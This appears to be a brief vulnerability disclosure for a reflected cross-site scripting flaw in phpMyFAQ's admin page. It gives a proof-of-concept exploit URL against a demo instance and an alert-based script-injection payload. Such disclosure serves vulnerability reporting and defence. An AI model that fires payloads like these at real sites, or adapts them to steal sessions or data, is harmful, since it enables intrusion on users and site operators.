Reflect Cross Site Scripting in thorsten/phpmyfaq
Nov 26th 2022
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Proof of Concept
Go to your web phpmyfaq and visit below URL.
Exploit URL: https://roy.demo.phpmyfaq.de/admin/index.php?action=SEX%22%3E%3CScRiPt%3Ealert(133333337)%3C/ScRiPt%3E
Payload USE: "><ScRiPt>alert(9699)</ScRiPt>
#YO Maintainer :) Long Time No SEE !